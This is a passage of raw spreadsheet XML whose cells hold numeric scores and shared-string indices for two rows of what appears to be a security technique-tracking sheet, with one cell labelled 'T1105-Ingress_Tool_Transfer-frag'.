      <c r="PY29" s="193"/>
      <c r="PZ29" s="193">
        <v>0</v>
      </c>
      <c r="QA29" s="464">
        <v>0</v>
      </c>
      <c r="QB29" s="120">
        <v>0</v>
      </c>
      <c r="QC29" s="120">
        <v>0</v>
      </c>
      <c r="QD29" s="120">
        <v>0</v>
      </c>
      <c r="QE29" s="193"/>
      <c r="QF29" s="193">
        <v>0</v>
      </c>
      <c r="QG29" s="464">
        <v>0</v>
      </c>
      <c r="QH29" s="120">
        <v>5</v>
      </c>
      <c r="QI29" s="120">
        <v>5</v>
      </c>
      <c r="QJ29" s="120">
        <v>1</v>
      </c>
      <c r="QK29" s="193" t="s">
        <v>2542</v>
      </c>
      <c r="QL29" s="193">
        <v>1</v>
      </c>
      <c r="QM29" s="464">
        <v>1</v>
      </c>
      <c r="QN29" s="120">
        <v>0</v>
      </c>
      <c r="QO29" s="120">
        <v>0</v>
      </c>
      <c r="QP29" s="120">
        <v>0</v>
      </c>
      <c r="QQ29" s="193"/>
      <c r="QR29" s="193">
        <v>0</v>
      </c>
      <c r="QS29" s="464">
        <v>0</v>
      </c>
      <c r="QT29" s="184"/>
      <c r="QU29" s="184"/>
      <c r="QV29" s="184"/>
      <c r="QW29" s="184"/>
      <c r="QX29" s="184"/>
      <c r="QY29" s="184"/>
      <c r="QZ29" s="184"/>
      <c r="RA29" s="184"/>
      <c r="RB29" s="184"/>
      <c r="RC29" s="184"/>
      <c r="RD29" s="184"/>
      <c r="RE29" s="184"/>
      <c r="RF29" s="184"/>
      <c r="RG29" s="184"/>
      <c r="RH29" s="184"/>
      <c r="RI29" s="184"/>
      <c r="RJ29" s="184"/>
      <c r="RK29" s="184"/>
      <c r="RL29" s="184"/>
      <c r="RM29" s="184"/>
      <c r="RN29" s="184"/>
      <c r="RO29" s="184"/>
      <c r="RP29" s="184"/>
      <c r="RQ29" s="184"/>
      <c r="RR29" s="184"/>
      <c r="RS29" s="184"/>
      <c r="RT29" s="184"/>
      <c r="RU29" s="184"/>
      <c r="RV29" s="184"/>
      <c r="RW29" s="184"/>
      <c r="RX29" s="184"/>
      <c r="RY29" s="184"/>
      <c r="RZ29" s="184"/>
      <c r="SA29" s="184"/>
      <c r="SB29" s="184"/>
      <c r="SC29" s="184"/>
      <c r="SD29" s="184"/>
      <c r="SE29" s="184"/>
      <c r="SF29" s="184"/>
      <c r="SG29" s="184"/>
      <c r="SH29" s="184"/>
      <c r="SI29" s="184"/>
      <c r="SJ29" s="184"/>
      <c r="SK29" s="184"/>
      <c r="SL29" s="184"/>
      <c r="SM29" s="184"/>
      <c r="SN29" s="184"/>
      <c r="SO29" s="184"/>
      <c r="SP29" s="184"/>
      <c r="SQ29" s="184"/>
      <c r="SR29" s="184"/>
      <c r="SS29" s="184"/>
      <c r="ST29" s="184"/>
      <c r="SU29" s="184"/>
      <c r="SV29" s="184"/>
      <c r="SW29" s="184"/>
      <c r="SX29" s="184"/>
      <c r="SY29" s="184"/>
      <c r="SZ29" s="184"/>
      <c r="TA29" s="184"/>
      <c r="TB29" s="184"/>
      <c r="TC29" s="184"/>
      <c r="TD29" s="184"/>
      <c r="TE29" s="184"/>
      <c r="TF29" s="184"/>
      <c r="TG29" s="184"/>
      <c r="TH29" s="184"/>
      <c r="TI29" s="184"/>
      <c r="TJ29" s="184"/>
      <c r="TK29" s="184"/>
      <c r="TL29" s="184"/>
      <c r="TM29" s="184"/>
      <c r="TN29" s="184"/>
      <c r="TO29" s="184"/>
      <c r="TP29" s="184"/>
      <c r="TQ29" s="184"/>
      <c r="TR29" s="184"/>
      <c r="TS29" s="184"/>
      <c r="TT29" s="184"/>
      <c r="TU29" s="184"/>
      <c r="TV29" s="184"/>
      <c r="TW29" s="184"/>
      <c r="TX29" s="184"/>
      <c r="TY29" s="184"/>
      <c r="TZ29" s="184"/>
      <c r="UA29" s="184"/>
      <c r="UB29" s="184"/>
      <c r="UC29" s="184"/>
      <c r="UD29" s="184"/>
      <c r="UE29" s="184"/>
      <c r="UF29" s="184"/>
      <c r="UG29" s="184"/>
      <c r="UH29" s="184"/>
      <c r="UI29" s="184"/>
      <c r="UJ29" s="184"/>
      <c r="UK29" s="184"/>
      <c r="UL29" s="184"/>
      <c r="UM29" s="184"/>
      <c r="UN29" s="184"/>
      <c r="UO29" s="184"/>
      <c r="UP29" s="184"/>
      <c r="UQ29" s="184"/>
      <c r="UR29" s="184"/>
      <c r="US29" s="184"/>
      <c r="UT29" s="184"/>
      <c r="UU29" s="184"/>
      <c r="UV29" s="184"/>
      <c r="UW29" s="184"/>
      <c r="UX29" s="184"/>
      <c r="UY29" s="184"/>
      <c r="UZ29" s="184"/>
      <c r="VA29" s="184"/>
      <c r="VB29" s="184"/>
      <c r="VC29" s="184"/>
      <c r="VD29" s="184"/>
      <c r="VE29" s="184"/>
      <c r="VF29" s="184"/>
      <c r="VG29" s="184"/>
      <c r="VH29" s="184"/>
      <c r="VI29" s="184"/>
      <c r="VJ29" s="184"/>
      <c r="VK29" s="184"/>
      <c r="VL29" s="184"/>
      <c r="VM29" s="184"/>
      <c r="VN29" s="184"/>
      <c r="VO29" s="184"/>
      <c r="VP29" s="184"/>
      <c r="VQ29" s="184"/>
      <c r="VR29" s="184"/>
      <c r="VS29" s="184"/>
      <c r="VT29" s="184"/>
      <c r="VU29" s="184"/>
      <c r="VV29" s="184"/>
      <c r="VW29" s="184"/>
      <c r="VX29" s="184"/>
      <c r="VY29" s="184"/>
    </row>
    <row r="30" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A30" s="82" t="s">
        <v>5</v>
      </c>
      <c r="B30" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C30" s="83" t="s">
        <v>466</v>
      </c>
      <c r="D30" s="83" t="s">
        <v>62</v>
      </c>
      <c r="E30" s="83">
        <f t="shared" si="2"/>
        <v>24</v>
      </c>
      <c r="F30" s="83" t="s">
        <v>63</v>
      </c>
      <c r="G30" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H30" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I30" s="81" t="s">
        <v>1024</v>
      </c>
      <c r="J30" s="85" t="s">
        <v>838</v>
      </c>
      <c r="K30" s="81" t="s">
        <v>1025</v>
      </c>
      <c r="L30" s="81" t="s">
        <v>1026</v>
      </c>
      <c r="M30" s="378" t="s">
        <v>204</v>
      </c>
      <c r="N30" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O30" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P30" s="91"/>
      <c r="Q30" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R30" s="92" t="s">
        <v>1027</v>
      </c>
      <c r="S30" s="93" t="s">
        <v>843</v>
      </c>
      <c r="T30" s="92" t="s">
        <v>1028</v>
      </c>
      <c r="U30" s="94" t="s">
        <v>1029</v>
      </c>
      <c r="V30" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W30" s="96" t="s">
        <v>1030</v>
      </c>
      <c r="X30" s="196" t="s">
        <v>1031</v>
      </c>
      <c r="Y30" s="83" t="s">
        <v>1032</v>
      </c>
      <c r="Z30" s="188" t="s">
        <v>1033</v>
      </c>
      <c r="AA30" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB30" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC30" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD30" s="83"/>
      <c r="AE30" s="83"/>
      <c r="AF30" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG30" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH30" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI30" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ30" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK30" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL30" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM30" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN30" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO30" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP30" s="385" t="str">
        <f>M30&amp;"-frag"</f>
        <v>T1105-Ingress_Tool_Transfer-frag</v>
      </c>
      <c r="AQ30" s="358">
        <v>7</v>
      </c>
      <c r="AR30" s="100"/>
      <c r="AS30" s="100">
        <v>1</v>
      </c>
      <c r="AT30" s="100">
        <v>0</v>
      </c>
      <c r="AU30" s="100">
        <v>1</v>
      </c>
      <c r="AV30" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW30" s="100">
        <v>1</v>
      </c>
      <c r="AX30" s="100">
        <v>1</v>
      </c>
      <c r="AY30" s="100">
        <v>0</v>
      </c>
      <c r="AZ30" s="100">
        <v>1</v>
      </c>
      <c r="BA30" s="381"/>
      <c r="BB30" s="101">
        <v>6</v>
      </c>
      <c r="BC30" s="102" t="s">
        <v>2966</v>
      </c>
      <c r="BD30" s="102">
        <v>3</v>
      </c>
      <c r="BE30" s="103" t="s">
        <v>1811</v>
      </c>
      <c r="BF30" s="103">
        <v>2</v>
      </c>
      <c r="BG30" s="104">
        <v>2</v>
      </c>
      <c r="BH30" s="105">
        <v>4</v>
      </c>
      <c r="BI30" s="106" t="s">
        <v>2967</v>
      </c>
      <c r="BJ30" s="497">
        <v>4</v>
      </c>
      <c r="BK30" s="107" t="s">
        <v>2968</v>
      </c>
      <c r="BL30" s="107">
        <v>2</v>
      </c>
      <c r="BM30" s="108">
        <v>4</v>
      </c>
      <c r="BN30" s="109">
        <v>10</v>
      </c>
      <c r="BO30" s="110" t="s">
        <v>2000</v>
      </c>
      <c r="BP30" s="501">
        <v>7</v>
      </c>
      <c r="BQ30" s="111" t="s">
        <v>2001</v>
      </c>
      <c r="BR30" s="111">
        <v>4</v>
      </c>
      <c r="BS30" s="112">
        <v>4</v>
      </c>
      <c r="BT30" s="113">
        <v>7</v>
      </c>
      <c r="BU30" s="114" t="s">
        <v>2969</v>
      </c>
      <c r="BV30" s="503">
        <v>4</v>
      </c>
      <c r="BW30" s="115" t="s">
        <v>2970</v>
      </c>
      <c r="BX30" s="115">
        <v>3</v>
      </c>
      <c r="BY30" s="116">
        <v>2</v>
      </c>
      <c r="BZ30" s="250">
        <v>11</v>
      </c>
      <c r="CA30" s="251" t="s">
        <v>2971</v>
      </c>
      <c r="CB30" s="505">
        <v>9</v>
      </c>
      <c r="CC30" s="252" t="s">
        <v>2972</v>
      </c>
      <c r="CD30" s="252">
        <v>7</v>
      </c>
      <c r="CE30" s="253">
        <v>5</v>
      </c>
      <c r="CF30" s="101">
        <v>18</v>
      </c>
      <c r="CG30" s="102" t="s">
        <v>2090</v>
      </c>
      <c r="CH30" s="102">
        <v>13</v>
      </c>
      <c r="CI30" s="103" t="s">
        <v>2091</v>
      </c>
      <c r="CJ30" s="103">
        <v>10</v>
      </c>
      <c r="CK30" s="104">
        <v>5</v>
      </c>
      <c r="CL30" s="105">
        <v>0</v>
      </c>
      <c r="CM30" s="106">
        <v>0</v>
      </c>
      <c r="CN30" s="497">
        <v>0</v>
      </c>
      <c r="CO30" s="107">
        <v>0</v>
      </c>
      <c r="CP30" s="107">
        <v>0</v>
      </c>
      <c r="CQ30" s="108">
        <v>0</v>
      </c>
      <c r="CR30" s="109">
        <v>0</v>
      </c>
      <c r="CS30" s="110">
        <v>0</v>
      </c>
      <c r="CT30" s="501">
        <v>0</v>
      </c>
      <c r="CU30" s="111">
        <v>0</v>
      </c>
      <c r="CV30" s="111">
        <v>0</v>
      </c>
      <c r="CW30" s="112">
        <v>0</v>
      </c>
      <c r="CX30" s="113">
        <v>10</v>
      </c>
      <c r="CY30" s="114" t="s">
        <v>2000</v>
      </c>
      <c r="CZ30" s="503">
        <v>7</v>
      </c>
      <c r="DA30" s="115" t="s">
        <v>2001</v>
      </c>
      <c r="DB30" s="115">
        <v>4</v>
      </c>
      <c r="DC30" s="116">
        <v>4</v>
      </c>
      <c r="DD30" s="101">
        <v>0</v>
      </c>
      <c r="DE30" s="102">
        <v>0</v>
      </c>
      <c r="DF30" s="102">
        <v>0</v>
      </c>
      <c r="DG30" s="103">
        <v>0</v>
      </c>
      <c r="DH30" s="103">
        <v>0</v>
      </c>
      <c r="DI30" s="104">
        <v>0</v>
      </c>
      <c r="DJ30" s="105">
        <v>3</v>
      </c>
      <c r="DK30" s="106" t="s">
        <v>1874</v>
      </c>
      <c r="DL30" s="497">
        <v>3</v>
      </c>
      <c r="DM30" s="107" t="s">
        <v>1843</v>
      </c>
      <c r="DN30" s="107">
        <v>1</v>
      </c>
      <c r="DO30" s="108">
        <v>3</v>
      </c>
      <c r="DP30" s="109">
        <v>3</v>
      </c>
      <c r="DQ30" s="110" t="s">
        <v>1874</v>
      </c>
      <c r="DR30" s="501">
        <v>3</v>
      </c>
      <c r="DS30" s="111" t="s">
        <v>1843</v>
      </c>
      <c r="DT30" s="111">
        <v>1</v>
      </c>
      <c r="DU30" s="112">
        <v>3</v>
      </c>
      <c r="DV30" s="113">
        <v>0</v>
      </c>
      <c r="DW30" s="114">
        <v>0</v>
      </c>
      <c r="DX30" s="503">
        <v>0</v>
      </c>
      <c r="DY30" s="115">
        <v>0</v>
      </c>
      <c r="DZ30" s="115">
        <v>0</v>
      </c>
      <c r="EA30" s="116">
        <v>0</v>
      </c>
      <c r="EB30" s="250">
        <v>4</v>
      </c>
      <c r="EC30" s="251" t="s">
        <v>2973</v>
      </c>
      <c r="ED30" s="505">
        <v>4</v>
      </c>
      <c r="EE30" s="252" t="s">
        <v>2974</v>
      </c>
      <c r="EF30" s="252">
        <v>2</v>
      </c>
      <c r="EG30" s="253">
        <v>4</v>
      </c>
      <c r="EH30" s="101">
        <v>4</v>
      </c>
      <c r="EI30" s="102" t="s">
        <v>2973</v>
      </c>
      <c r="EJ30" s="102">
        <v>4</v>
      </c>
      <c r="EK30" s="103" t="s">
        <v>2974</v>
      </c>
      <c r="EL30" s="103">
        <v>2</v>
      </c>
      <c r="EM30" s="104">
        <v>4</v>
      </c>
      <c r="EN30" s="105">
        <v>0</v>
      </c>
      <c r="EO30" s="106">
        <v>0</v>
      </c>
      <c r="EP30" s="497">
        <v>0</v>
      </c>
      <c r="EQ30" s="107">
        <v>0</v>
      </c>
      <c r="ER30" s="107">
        <v>0</v>
      </c>
      <c r="ES30" s="108">
        <v>0</v>
      </c>
      <c r="ET30" s="109">
        <v>0</v>
      </c>
      <c r="EU30" s="110">
        <v>0</v>
      </c>
      <c r="EV30" s="501">
        <v>0</v>
      </c>
      <c r="EW30" s="111">
        <v>0</v>
      </c>
      <c r="EX30" s="111">
        <v>0</v>
      </c>
      <c r="EY30" s="112">
        <v>0</v>
      </c>
      <c r="EZ30" s="113">
        <v>3</v>
      </c>
      <c r="FA30" s="114" t="s">
        <v>1874</v>
      </c>
      <c r="FB30" s="503">
        <v>3</v>
      </c>
      <c r="FC30" s="115" t="s">
        <v>1843</v>
      </c>
      <c r="FD30" s="115">
        <v>1</v>
      </c>
      <c r="FE30" s="116">
        <v>3</v>
      </c>
      <c r="FF30" s="101">
        <v>5</v>
      </c>
      <c r="FG30" s="102" t="s">
        <v>1815</v>
      </c>
      <c r="FH30" s="102">
        <v>2</v>
      </c>
      <c r="FI30" s="103" t="s">
        <v>336</v>
      </c>
      <c r="FJ30" s="103">
        <v>1</v>
      </c>
      <c r="FK30" s="104">
        <v>2</v>
      </c>
      <c r="FL30" s="105">
        <v>0</v>
      </c>
      <c r="FM30" s="106">
        <v>0</v>
      </c>
      <c r="FN30" s="497">
        <v>0</v>
      </c>
      <c r="FO30" s="107">
        <v>0</v>
      </c>
      <c r="FP30" s="107">
        <v>0</v>
      </c>
      <c r="FQ30" s="108">
        <v>0</v>
      </c>
      <c r="FR30" s="109">
        <v>5</v>
      </c>
      <c r="FS30" s="110" t="s">
        <v>1815</v>
      </c>
      <c r="FT30" s="501">
        <v>2</v>
      </c>
      <c r="FU30" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FV30" s="111">
        <v>1</v>
      </c>
      <c r="FW30" s="112">
        <v>2</v>
      </c>
      <c r="FX30" s="113">
        <v>5</v>
      </c>
      <c r="FY30" s="114" t="s">
        <v>1815</v>
      </c>
      <c r="FZ30" s="503">
        <v>2</v>
      </c>
      <c r="GA30" s="115" t="s">
        <v>336</v>
      </c>
      <c r="GB30" s="115">
        <v>1</v>
      </c>
      <c r="GC30" s="116">
        <v>2</v>
      </c>
      <c r="GD30" s="250">
        <v>4</v>
      </c>
      <c r="GE30" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF30" s="505">
        <v>2</v>
      </c>
      <c r="GG30" s="252" t="s">
        <v>1903</v>
      </c>
      <c r="GH30" s="252">
        <v>2</v>
      </c>
      <c r="GI30" s="253">
        <v>1</v>
      </c>
      <c r="GJ30" s="101">
        <v>9</v>
      </c>
      <c r="GK30" s="102" t="s">
        <v>2975</v>
      </c>
      <c r="GL30" s="102">
        <v>4</v>
      </c>
      <c r="GM30" s="103" t="s">
        <v>2565</v>
      </c>
      <c r="GN30" s="103">
        <v>3</v>
      </c>
      <c r="GO30" s="104">
        <v>3</v>
      </c>
      <c r="GP30" s="105">
        <v>0</v>
      </c>
      <c r="GQ30" s="106">
        <v>0</v>
      </c>
      <c r="GR30" s="497">
        <v>0</v>
      </c>
      <c r="GS30" s="107">
        <v>0</v>
      </c>
      <c r="GT30" s="107">
        <v>0</v>
      </c>
      <c r="GU30" s="108">
        <v>0</v>
      </c>
      <c r="GV30" s="109">
        <v>0</v>
      </c>
      <c r="GW30" s="110">
        <v>0</v>
      </c>
      <c r="GX30" s="501">
        <v>0</v>
      </c>
      <c r="GY30" s="111">
        <v>0</v>
      </c>
      <c r="GZ30" s="111">
        <v>0</v>
      </c>
      <c r="HA30" s="112">
        <v>0</v>
      </c>
      <c r="HB30" s="113">
        <v>5</v>
      </c>
      <c r="HC30" s="114" t="s">
        <v>1815</v>
      </c>
      <c r="HD30" s="503">
        <v>2</v>
      </c>
      <c r="HE30" s="115" t="s">
        <v>336</v>
      </c>
      <c r="HF30" s="115">
        <v>1</v>
      </c>
      <c r="HG30" s="116">
        <v>2</v>
      </c>
      <c r="HH30" s="101">
        <v>1</v>
      </c>
      <c r="HI30" s="102" t="s">
        <v>2496</v>
      </c>
      <c r="HJ30" s="102">
        <v>1</v>
      </c>
      <c r="HK30" s="103" t="s">
        <v>319</v>
      </c>
      <c r="HL30" s="103">
        <v>1</v>
      </c>
      <c r="HM30" s="104">
        <v>1</v>
      </c>
      <c r="HN30" s="105">
        <v>1</v>
      </c>
      <c r="HO30" s="106" t="s">
        <v>2976</v>
      </c>
      <c r="HP30" s="497">
        <v>1</v>
      </c>
      <c r="HQ30" s="107" t="s">
        <v>2977</v>
      </c>
      <c r="HR30" s="107">
        <v>1</v>
      </c>
      <c r="HS30" s="108">
        <v>1</v>
      </c>
      <c r="HT30" s="109">
        <v>2</v>
      </c>
      <c r="HU30" s="110" t="s">
        <v>2978</v>
      </c>
      <c r="HV30" s="501">
        <v>2</v>
      </c>
      <c r="HW30" s="111" t="s">
        <v>2979</v>
      </c>
      <c r="HX30" s="111">
        <v>2</v>
      </c>
      <c r="HY30" s="112">
        <v>1</v>
      </c>
      <c r="HZ30" s="113">
        <v>2</v>
      </c>
      <c r="IA30" s="114" t="s">
        <v>2980</v>
      </c>
      <c r="IB30" s="503">
        <v>2</v>
      </c>
      <c r="IC30" s="115" t="s">
        <v>2981</v>
      </c>
      <c r="ID30" s="115">
        <v>2</v>
      </c>
      <c r="IE30" s="116">
        <v>1</v>
      </c>
      <c r="IF30" s="250">
        <v>3</v>
      </c>
      <c r="IG30" s="251" t="s">
        <v>2982</v>
      </c>
      <c r="IH30" s="505">
        <v>3</v>
      </c>
      <c r="II30" s="252" t="s">
        <v>2983</v>
      </c>
      <c r="IJ30" s="252">
        <v>3</v>
      </c>
      <c r="IK30" s="253">
        <v>1</v>
      </c>
      <c r="IL30" s="101">
        <v>5</v>
      </c>
      <c r="IM30" s="102" t="s">
        <v>2984</v>
      </c>
      <c r="IN30" s="102">
        <v>5</v>
      </c>
      <c r="IO30" s="103" t="s">
        <v>2985</v>
      </c>
      <c r="IP30" s="103">
        <v>5</v>
      </c>
      <c r="IQ30" s="104">
        <v>1</v>
      </c>
      <c r="IR30" s="105">
        <v>0</v>
      </c>
      <c r="IS30" s="106">
        <v>0</v>
      </c>
      <c r="IT30" s="497">
        <v>0</v>
      </c>
      <c r="IU30" s="107">
        <v>0</v>
      </c>
      <c r="IV30" s="107">
        <v>0</v>
      </c>
      <c r="IW30" s="108">
        <v>0</v>
      </c>
      <c r="IX30" s="109">
        <v>0</v>
      </c>
      <c r="IY30" s="110">
        <v>0</v>
      </c>
      <c r="IZ30" s="501">
        <v>0</v>
      </c>
      <c r="JA30" s="111">
        <v>0</v>
      </c>
      <c r="JB30" s="111">
        <v>0</v>
      </c>
      <c r="JC30" s="112">
        <v>0</v>
      </c>
      <c r="JD30" s="113">
        <v>2</v>
      </c>
      <c r="JE30" s="114" t="s">
        <v>2978</v>
      </c>
      <c r="JF30" s="503">
        <v>2</v>
      </c>
      <c r="JG30" s="115" t="s">
        <v>2979</v>
      </c>
      <c r="JH30" s="115">
        <v>2</v>
      </c>
      <c r="JI30" s="116">
        <v>1</v>
      </c>
      <c r="JJ30" s="101">
        <v>0</v>
      </c>
      <c r="JK30" s="102">
        <v>0</v>
      </c>
      <c r="JL30" s="102">
        <v>0</v>
      </c>
      <c r="JM30" s="103">
        <v>0</v>
      </c>
      <c r="JN30" s="103">
        <v>0</v>
      </c>
      <c r="JO30" s="104">
        <v>0</v>
      </c>
      <c r="JP30" s="105">
        <v>0</v>
      </c>
      <c r="JQ30" s="106">
        <v>0</v>
      </c>
      <c r="JR30" s="497">
        <v>0</v>
      </c>
      <c r="JS30" s="107">
        <v>0</v>
      </c>
      <c r="JT30" s="107">
        <v>0</v>
      </c>
      <c r="JU30" s="108">
        <v>0</v>
      </c>
      <c r="JV30" s="109">
        <v>0</v>
      </c>
      <c r="JW30" s="110">
        <v>0</v>
      </c>
      <c r="JX30" s="501">
        <v>0</v>
      </c>
      <c r="JY30" s="111">
        <v>0</v>
      </c>
      <c r="JZ30" s="111">
        <v>0</v>
      </c>
      <c r="KA30" s="112">
        <v>0</v>
      </c>
      <c r="KB30" s="113">
        <v>0</v>
      </c>
      <c r="KC30" s="114">
        <v>0</v>
      </c>
      <c r="KD30" s="503">
        <v>0</v>
      </c>
      <c r="KE30" s="115">
        <v>0</v>
      </c>
      <c r="KF30" s="115">
        <v>0</v>
      </c>
      <c r="KG30" s="116">
        <v>0</v>
      </c>
      <c r="KH30" s="250">
        <v>0</v>
      </c>
      <c r="KI30" s="251">
        <v>0</v>
      </c>
      <c r="KJ30" s="505">
        <v>0</v>
      </c>
      <c r="KK30" s="252">
        <v>0</v>
      </c>
      <c r="KL30" s="252">
        <v>0</v>
      </c>
      <c r="KM30" s="253">
        <v>0</v>
      </c>
      <c r="KN30" s="101">
        <v>0</v>
      </c>
      <c r="KO30" s="102">
        <v>0</v>
      </c>
      <c r="KP30" s="102">
        <v>0</v>
      </c>
      <c r="KQ30" s="103">
        <v>0</v>
      </c>
      <c r="KR30" s="103">
        <v>0</v>
      </c>
      <c r="KS30" s="104">
        <v>0</v>
      </c>
      <c r="KT30" s="105">
        <v>0</v>
      </c>
      <c r="KU30" s="106">
        <v>0</v>
      </c>
      <c r="KV30" s="497">
        <v>0</v>
      </c>
      <c r="KW30" s="107">
        <v>0</v>
      </c>
      <c r="KX30" s="107">
        <v>0</v>
      </c>
      <c r="KY30" s="108">
        <v>0</v>
      </c>
      <c r="KZ30" s="109">
        <v>0</v>
      </c>
      <c r="LA30" s="110">
        <v>0</v>
      </c>
      <c r="LB30" s="501">
        <v>0</v>
      </c>
      <c r="LC30" s="111">
        <v>0</v>
      </c>
      <c r="LD30" s="111">
        <v>0</v>
      </c>
      <c r="LE30" s="112">
        <v>0</v>
      </c>
      <c r="LF30" s="113">
        <v>0</v>
      </c>
      <c r="LG30" s="114">
        <v>0</v>
      </c>
      <c r="LH30" s="503">
        <v>0</v>
      </c>
      <c r="LI30" s="115">
        <v>0</v>
      </c>
      <c r="LJ30" s="115">
        <v>0</v>
      </c>
      <c r="LK30" s="116">
        <v>0</v>
      </c>
      <c r="LL30" s="117">
        <v>6</v>
      </c>
      <c r="LM30" s="507">
        <v>2</v>
      </c>
      <c r="LN30" s="119">
        <v>1</v>
      </c>
      <c r="LO30" s="119">
        <v>1</v>
      </c>
      <c r="LP30" s="119">
        <v>2</v>
      </c>
      <c r="LQ30" s="119">
        <v>1</v>
      </c>
      <c r="LR30" s="119">
        <v>1</v>
      </c>
      <c r="LS30" s="119">
        <v>2</v>
      </c>
      <c r="LT30" s="382"/>
      <c r="LU30" s="117">
        <v>0</v>
      </c>
      <c r="LV30" s="118">
        <v>0</v>
      </c>
      <c r="LW30" s="507">
        <v>0</v>
      </c>
      <c r="LX30" s="119">
        <v>0</v>
      </c>
      <c r="LY30" s="119">
        <v>0</v>
      </c>
      <c r="LZ30" s="119">
        <v>0</v>
      </c>
      <c r="MA30" s="117">
        <v>0</v>
      </c>
      <c r="MB30" s="118">
        <v>0</v>
      </c>
      <c r="MC30" s="507">
        <v>0</v>
      </c>
      <c r="MD30" s="119">
        <v>0</v>
      </c>
      <c r="ME30" s="119">
        <v>0</v>
      </c>
      <c r="MF30" s="119">
        <v>0</v>
      </c>
      <c r="MG30" s="117">
        <v>0</v>
      </c>
      <c r="MH30" s="118">
        <v>0</v>
      </c>
      <c r="MI30" s="507">
        <v>0</v>
      </c>
      <c r="MJ30" s="119">
        <v>0</v>
      </c>
      <c r="MK30" s="119">
        <v>0</v>
      </c>
      <c r="ML30" s="119">
        <v>0</v>
      </c>
      <c r="MM30" s="117">
        <v>0</v>
      </c>
      <c r="MN30" s="118">
        <v>0</v>
      </c>
      <c r="MO30" s="507">
        <v>0</v>
      </c>
      <c r="MP30" s="119">
        <v>0</v>
      </c>
      <c r="MQ30" s="119">
        <v>0</v>
      </c>
      <c r="MR30" s="119">
        <v>0</v>
      </c>
      <c r="MS30" s="117">
        <v>1</v>
      </c>
      <c r="MT30" s="118" t="s">
        <v>4196</v>
      </c>
      <c r="MU30" s="507">
        <v>1</v>
      </c>
      <c r="MV30" s="119" t="s">
        <v>2658</v>
      </c>
      <c r="MW30" s="119">
        <v>1</v>
      </c>
      <c r="MX30" s="119">
        <v>1</v>
      </c>
      <c r="MY30" s="117">
        <v>0</v>
      </c>
      <c r="MZ30" s="118">
        <v>0</v>
      </c>
      <c r="NA30" s="507">
        <v>0</v>
      </c>
      <c r="NB30" s="119">
        <v>0</v>
      </c>
      <c r="NC30" s="119">
        <v>0</v>
      </c>
      <c r="ND30" s="119">
        <v>0</v>
      </c>
      <c r="NE30" s="117">
        <v>0</v>
      </c>
      <c r="NF30" s="118">
        <v>0</v>
      </c>
      <c r="NG30" s="507">
        <v>0</v>
      </c>
      <c r="NH30" s="119">
        <v>0</v>
      </c>
      <c r="NI30" s="119">
        <v>0</v>
      </c>
      <c r="NJ30" s="119">
        <v>0</v>
      </c>
      <c r="NK30" s="117">
        <v>0</v>
      </c>
      <c r="NL30" s="118">
        <v>0</v>
      </c>
      <c r="NM30" s="507">
        <v>0</v>
      </c>
      <c r="NN30" s="119">
        <v>0</v>
      </c>
      <c r="NO30" s="119">
        <v>0</v>
      </c>
      <c r="NP30" s="119">
        <v>0</v>
      </c>
      <c r="NQ30" s="117">
        <v>0</v>
      </c>
      <c r="NR30" s="118">
        <v>0</v>
      </c>
      <c r="NS30" s="507">
        <v>0</v>
      </c>
      <c r="NT30" s="119">
        <v>0</v>
      </c>
      <c r="NU30" s="119">
        <v>0</v>
      </c>
      <c r="NV30" s="119">
        <v>0</v>
      </c>
      <c r="NW30" s="117">
        <v>5</v>
      </c>
      <c r="NX30" s="118" t="s">
        <v>4340</v>
      </c>
      <c r="NY30" s="507">
        <v>1</v>
      </c>
      <c r="NZ30" s="119" t="s">
        <v>2986</v>
      </c>
      <c r="OA30" s="119">
        <v>1</v>
      </c>
      <c r="OB30" s="119">
        <v>1</v>
      </c>
      <c r="OC30" s="120">
        <v>2</v>
      </c>
      <c r="OD30" s="120">
        <v>2</v>
      </c>
      <c r="OE30" s="120">
        <v>1</v>
      </c>
      <c r="OF30" s="121">
        <v>1</v>
      </c>
      <c r="OG30" s="120">
        <v>2</v>
      </c>
      <c r="OH30" s="120">
        <v>2</v>
      </c>
      <c r="OI30" s="120">
        <v>2</v>
      </c>
      <c r="OJ30" s="120">
        <v>2</v>
      </c>
      <c r="OK30" s="383"/>
      <c r="OL30" s="120">
        <v>0</v>
      </c>
      <c r="OM30" s="120">
        <v>0</v>
      </c>
      <c r="ON30" s="120">
        <v>0</v>
      </c>
      <c r="OO30" s="120"/>
      <c r="OP30" s="120">
        <v>0</v>
      </c>
      <c r="OQ30" s="464">
        <v>0</v>
      </c>
      <c r="OR30" s="120">
        <v>0</v>
      </c>
      <c r="OS30" s="120">
        <v>0</v>
      </c>
      <c r="OT30" s="120">
        <v>0</v>
      </c>
      <c r="OU30" s="120"/>
      <c r="OV30" s="120">
        <v>0</v>
      </c>
      <c r="OW30" s="464">
        <v>0</v>
      </c>
      <c r="OX30" s="120">
        <v>0</v>
      </c>
      <c r="OY30" s="120">
        <v>0</v>
      </c>
      <c r="OZ30" s="120">
        <v>0</v>
      </c>
      <c r="PA30" s="120"/>
      <c r="PB30" s="120">
        <v>0</v>
      </c>
      <c r="PC30" s="464">
        <v>0</v>
      </c>
      <c r="PD30" s="120">
        <v>2</v>
      </c>
      <c r="PE30" s="120">
        <v>2</v>
      </c>
